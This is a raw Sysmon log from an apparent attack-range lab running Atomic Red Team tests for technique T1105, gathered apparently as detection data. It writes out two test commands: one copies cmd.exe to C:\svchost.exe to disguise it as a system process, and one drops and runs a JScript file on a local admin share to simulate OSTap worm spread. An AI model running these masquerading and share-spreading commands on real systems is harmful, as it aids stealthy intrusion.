21:49:27.185{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917339Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.185{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917338Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.184{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917337Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.184{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917336Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.184{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917335Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.174{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "copy C:\Windows\System32\cmd.exe C:\svchost.exe & C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917334Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.173{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917333Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.172{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917332Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.138{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=7AAFD4C17A4B5691B6C609D9D110FB5D,SHA256=2E2843AE962CAAD907CF999DD49D28E0E895151AA8BE7859E6C062BAAFD8B70F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917331Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.114{896A638B-B5C0-6058-0100-00000000AE01}4NT AUTHORITY\SYSTEMSystemC:\AtomicTestFileT1105.jsMD5=45FC6505C19F7CDB0A912842869ED9F7,SHA256=BCE30B57860D3D2BC27056CBC216EE0888A7DC753935FF2AACC8386770C34D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917330Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.112{896A638B-B5C0-6058-0100-00000000AE01}4NT AUTHORITY\SYSTEMSystemC:\AtomicTestT1105.jsMD5=648105C2565C13E8F1B83D8346F6AE77,SHA256=2399C595872275FBFAA9315BFDCEB5C9EC0DDF4B1B8A0C08AA529DEA616124AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917329Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.053{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917328Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.051{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917327Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.051{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917326Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.041{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917325Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.038{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917324Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.038{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917323Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.038{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917322Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.038{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917321Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.037{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917320Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.037{896A638B-B3E7-605B-7169-00000000AE01}80326792C:\Windows\system32\cmd.exe{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\system32\cscript.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917319Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.036{896A638B-B3E7-605B-7269-00000000AE01}4108C:\Windows\System32\cscript.exe5.812.10240.16384Microsoft ® Console Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationcscript.exeCScript.exe AtomicTestT1105.js //E:JScript Z:\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=8552F94CFD39A4C307BCD1BD88D41604,SHA256=6216383428EAB3292C5590C70D24B33A7D84FBF1C463E331C40F052E6EA356FE,IMPHASH=77838A7D26CC1C7050C41CF6165BAD0E{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "pushd \\localhost\C$ & echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js & CScript.exe AtomicTestT1105.js //E:JScript & del AtomicTestT1105.js /Q >nul 2>&1 & del AtomicTestFileT1105.js /Q >nul 2>&1 & popd" 10341000x80000000000000005917318Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.014{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917317Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.012{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917316Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.011{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917315Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.010{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917314Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.010{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917313Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.010{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917312Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.010{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7169-00000000AE01}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917311Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 